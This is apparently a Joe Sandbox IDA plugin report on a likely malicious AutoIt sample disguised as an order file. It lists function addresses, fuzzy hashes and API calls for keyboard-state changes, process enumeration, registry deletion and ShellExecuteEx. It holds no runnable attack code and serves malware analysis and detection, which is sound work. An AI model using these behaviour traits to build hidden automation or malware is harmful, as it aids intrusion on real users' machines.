Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 0fe7d9a37a9f63ac8ec6b8a9b163390e695f3ad3faa25189bc9110d7caab2ef2
Instruction ID: 260066c5e5e4a9bcc23054271a57b0ecdc699e69a2cb6ef03eb2a9349da45ed2
Opcode Fuzzy Hash: 0fe7d9a37a9f63ac8ec6b8a9b163390e695f3ad3faa25189bc9110d7caab2ef2
Instruction Fuzzy Hash: 9BE15E71A00209EFCF04EF94C884EAEB7B9FF89315F10855AF905AB251DB35AD46CB94

Function 00470133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

GetSystemMetrics.USER32(0000000F), ref: 0047016D
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0047038D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 004703AB
InvalidateRect.USER32(?,00000000,00000001,?), ref: 004703D6
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 004703FF
ShowWindow.USER32(00000003,00000000), ref: 00470421
DefDlgProcW.USER32(?,00000005,?,?), ref: 00470440

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
String ID:
API String ID: 3356174886-0
Opcode ID: a9f192c88a830d13c6a57c004f71dec426e7d16346bc4acf5147b0ab99bb992f
Instruction ID: 173c988fa6835b5105b4736bd6ec62156792104ef1851415c511a9b98474d389
Opcode Fuzzy Hash: a9f192c88a830d13c6a57c004f71dec426e7d16346bc4acf5147b0ab99bb992f
Instruction Fuzzy Hash: 87A1AF35601616EBDB18CF68C9857FEBBB1BF04700F04C16AEC58AB291D778AD61CB94

Function 0041AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad86bef8a51725d2c0d98b22889656229f96a8a036ca2fc8ab77573dcfcf77f3
Instruction ID: 443efc5314a38a124e106a75654bdb1c3ac73b7b7c16e89892f607a707915728
Opcode Fuzzy Hash: ad86bef8a51725d2c0d98b22889656229f96a8a036ca2fc8ab77573dcfcf77f3
Instruction Fuzzy Hash: 74717E70901109EFCB04CF99CC48AEFBB75FF89314F14855AF915AA251C7389A52CFA9

Function 00462230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0046225A
_memset.LIBCMT ref: 00462323
ShellExecuteExW.SHELL32(?), ref: 00462368

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

Part of subcall function 0041C6F4: _wcscpy.LIBCMT ref: 0041C717

CloseHandle.KERNEL32(00000000), ref: 0046242F
FreeLibrary.KERNEL32(00000000), ref: 0046243E

Strings

@, xrefs: 00462334

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: d506ead725ea237f24e8c3a9657f2dd085f67592a0a04d62172c77dc68d0a3bd
Instruction ID: fe3cf0ec08732bc4d8dc6c0a237379d0b91af6d135dd8010ae47e82a7a5a3c8a
Opcode Fuzzy Hash: d506ead725ea237f24e8c3a9657f2dd085f67592a0a04d62172c77dc68d0a3bd
Instruction Fuzzy Hash: FC716D70A00619AFCF04EFA5C98199EB7F5FF48314F10846EE855AB391DB78AD40CB99

Function 00443DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00443DE7
GetKeyboardState.USER32(?), ref: 00443DFC
SetKeyboardState.USER32(?), ref: 00443E5D
PostMessageW.USER32(?,00000101,00000010,?), ref: 00443E8B
PostMessageW.USER32(?,00000101,00000011,?), ref: 00443EAA
PostMessageW.USER32(?,00000101,00000012,?), ref: 00443EF0
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00443F13

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 2aab909bf040e6e11fb6b29c0dd93a1f7b93e399b2fd17828b5265be11de9d62
Instruction ID: 0ca6ad41875bd9d7f6356d970447a4c0e540482953f38d9662d732e149db20a4
Opcode Fuzzy Hash: 2aab909bf040e6e11fb6b29c0dd93a1f7b93e399b2fd17828b5265be11de9d62
Instruction Fuzzy Hash: CB51D2A0A047D53DFB364A248C45BBB7EA95B06B05F08458EF0D5469C3D39CAEC8D758

Function 00443BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00443C02
GetKeyboardState.USER32(?), ref: 00443C17
SetKeyboardState.USER32(?), ref: 00443C78
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00443CA4
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00443CC1
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00443D05
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00443D26

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: ee78b3fa11ab1283d4dcb114b632edfbd7013f7b1c477bab22259d3f686a54bf
Instruction ID: 82043ea9113a7ea8027da421482251fe986c3d5fc201b27a04205b0442957917
Opcode Fuzzy Hash: ee78b3fa11ab1283d4dcb114b632edfbd7013f7b1c477bab22259d3f686a54bf
Instruction Fuzzy Hash: EF5107A19047D53DFB328B348C46B7BBFA99F06B06F08848EE0D5565C3D298EE84D758

Function 00447DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00447DBE
_wcsncpy.LIBCMT ref: 00447DF3
_wcsncpy.LIBCMT ref: 00447E25
_wcsncpy.LIBCMT ref: 00447E58
_wcsncpy.LIBCMT ref: 00447E9A
_wcsncpy.LIBCMT ref: 00447ED4
_wcsncpy.LIBCMT ref: 00447F03

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 82a3674f3e19fbdef0c818efbcbf46cd2e7acf95712a327e08f2885954205449
Instruction ID: f58121f992f98597012e031df4a71890debd5d72de1f2ed16f8d471735d7ba07
Opcode Fuzzy Hash: 82a3674f3e19fbdef0c818efbcbf46cd2e7acf95712a327e08f2885954205449
Instruction Fuzzy Hash: E6417166E1022476DB10EBF5D8469CFB3AC9F05314F90896BE504E3122FB78E615C3AD

Function 00463D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00463DA1
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00463DCB
FreeLibrary.KERNEL32(00000000), ref: 00463E80

Part of subcall function 00463D72: RegCloseKey.ADVAPI32(?), ref: 00463DE8
Part of subcall function 00463D72: FreeLibrary.KERNEL32(?), ref: 00463E3A
Part of subcall function 00463D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00463E5D

RegDeleteKeyW.ADVAPI32(?,?), ref: 00463E25

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 995f421bff5c940f39430ca4140bd21da414a3e2d1990d58f1e7ad7d63574b7a
Instruction ID: acc953e5f1aa74c6fab867faaf90b0538a7f1f49f7e5a1b73acc91b2943ac2f8
Opcode Fuzzy Hash: 995f421bff5c940f39430ca4140bd21da414a3e2d1990d58f1e7ad7d63574b7a
Instruction Fuzzy Hash: B83119B1D01109BFDB159F90DC89AFFB7BCEF08305F00056AA512A2290E6759F499BB5

Function 00468FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00468FE7
GetWindowLongW.USER32(00CDE720,000000F0), ref: 0046901A
GetWindowLongW.USER32(00CDE720,000000F0), ref: 0046904F
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00469081
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004690AB
GetWindowLongW.USER32(00000000,000000F0), ref: 004690BC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004690D6

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: cd13acf13326ff912c1b6a8db85b63e49255f30fb394f9c84299d8e026cc45a0
Instruction ID: 6c1353d9cf321ea898b21e40fd174f800445483b6db885a06172db092e97f94c
Opcode Fuzzy Hash: cd13acf13326ff912c1b6a8db85b63e49255f30fb394f9c84299d8e026cc45a0
Instruction Fuzzy Hash: E7313934700215DFDB20CF58DC84F6537A9FB4A718F14026AF5199B2B2DBB5AC40DB4A

Function 004408AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004408F2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00440918
SysAllocString.OLEAUT32(00000000), ref: 0044091B
SysAllocString.OLEAUT32(?), ref: 00440939
SysFreeString.OLEAUT32(?), ref: 00440942
StringFromGUID2.OLE32(?,?,00000028), ref: 00440967
SysAllocString.OLEAUT32(?), ref: 00440975

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: cebbbf19b5b55addaad6d6587a8c56073dd7b7d6e0d40113f6ce2697a897e9ea
Instruction ID: 670d1140b47f98b37c90b3f1203f5f0870597e9ef3b46a752cba0966611f4e2a
Opcode Fuzzy Hash: cebbbf19b5b55addaad6d6587a8c56073dd7b7d6e0d40113f6ce2697a897e9ea
Instruction Fuzzy Hash: 81219776601219AFEB10AF78DC88DAF73ACEF09360B048526FA15DB291D674EC458768

Function 00442472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00442485
__wcsnicmp.LIBCMT ref: 004424A6
__wcsnicmp.LIBCMT ref: 004424C0

Strings

#notrayicon, xrefs: 0044247D
#OnAutoItStartRegister, xrefs: 004424BA
#requireadmin, xrefs: 004424A0

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 1851d1b4e6960cd03ac9d1d05ef331729ad499fc0484a12b4716bd25480e5267
Instruction ID: a173347789446804f2164791aadcb3723f806e4114576909bb7f9119596bce02
Opcode Fuzzy Hash: 1851d1b4e6960cd03ac9d1d05ef331729ad499fc0484a12b4716bd25480e5267
Instruction Fuzzy Hash: CF216A7160012177E620E6359E12FB77398EF64308FA0402BF446A7182E6ED9982C2AD

Function 00440986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004409CB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004409F1
SysAllocString.OLEAUT32(00000000), ref: 004409F4
SysAllocString.OLEAUT32 ref: 00440A15
SysFreeString.OLEAUT32 ref: 00440A1E
StringFromGUID2.OLE32(?,?,00000028), ref: 00440A38
SysAllocString.OLEAUT32(?), ref: 00440A46

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: bdb25d7be96f370230d0b4c1ec6a9438b81f23539dbcd8e1c0913e2efecb882c
Instruction ID: 220da2e8b19451a2a961b14a861e80d9e5b321ba20eb580aa9f72d8ab3c780ef
Opcode Fuzzy Hash: bdb25d7be96f370230d0b4c1ec6a9438b81f23539dbcd8e1c0913e2efecb882c
Instruction Fuzzy Hash: 28219B75601204AFEB10EFB8DD89DAB77ECEF183607048536FA09DB2A1D674EC458B58

Function 0046A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0041D1BA
Part of subcall function 0041D17C: GetStockObject.GDI32(00000011), ref: 0041D1CE
Part of subcall function 0041D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0041D1D8

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0046A32D
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0046A33A
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0046A345
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0046A354
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0046A360

Strings

Msctls_Progress32, xrefs: 0046A2FE

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: a0e80b4b36f74745d8a732ff1c6da4458f8fff69b2c7d0ed606832bd1b4c196d
Instruction ID: c087a3ff2feba92329301fd61567ed14b88ced6f3f48c980a85726e2cd280ca0
Opcode Fuzzy Hash: a0e80b4b36f74745d8a732ff1c6da4458f8fff69b2c7d0ed606832bd1b4c196d
Instruction Fuzzy Hash: 4911D0B1500219BEEF104F61CC85EEB7F6DFF08398F014115BA08A21A0D7769C22DBA8

Function 0041CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0041CCF6
GetWindowRect.USER32(?,?), ref: 0041CD37
ScreenToClient.USER32(?,000000FF), ref: 0041CD5F
GetClientRect.USER32(?,?), ref: 0041CE8C
GetWindowRect.USER32(?,?), ref: 0041CEA5

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: a95f9749c6526a6e85246753ac1fa92aeee7def737737484697f95a748c97b68
Instruction ID: 1cbbbf1eee6a61c32d83d92f802d5fff4e9bef6c0e677c0be53b69fc92052790
Opcode Fuzzy Hash: a95f9749c6526a6e85246753ac1fa92aeee7def737737484697f95a748c97b68
Instruction Fuzzy Hash: 1AB13C79900249DBDF10CFA9C9807EEB7B1FF08310F14956AEC59EB250DB34A991CB69

Function 00461BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00461C18
Process32FirstW.KERNEL32(00000000,?), ref: 00461C26
__wsplitpath.LIBCMT ref: 00461C54

Part of subcall function 00421DFC: __wsplitpath_helper.LIBCMT ref: 00421E3C

_wcscat.LIBCMT ref: 00461C69
Process32NextW.KERNEL32(00000000,?), ref: 00461CDF
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00461CF1

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 1380811348-0
Opcode ID: d9ca964e7b60998e1817c17e534577381b4306b0ccf4c73c7e89f9141338cf87
Instruction ID: 0edaadf84994a2fbf7c439804e0bae43028fdd83e05788a9d6c16c43eb8ecc8b
Opcode Fuzzy Hash: d9ca964e7b60998e1817c17e534577381b4306b0ccf4c73c7e89f9141338cf87
Instruction Fuzzy Hash: 215170B15043009FD720EF25D885EAFB7E8EF88758F04492EF58597291EB74A904CB9A

Function 00462FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00463C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00462BB5,?,?), ref: 00463C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004630AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004630EF
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00463112
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046313B
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046317E
RegCloseKey.ADVAPI32(00000000), ref: 0046318B

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

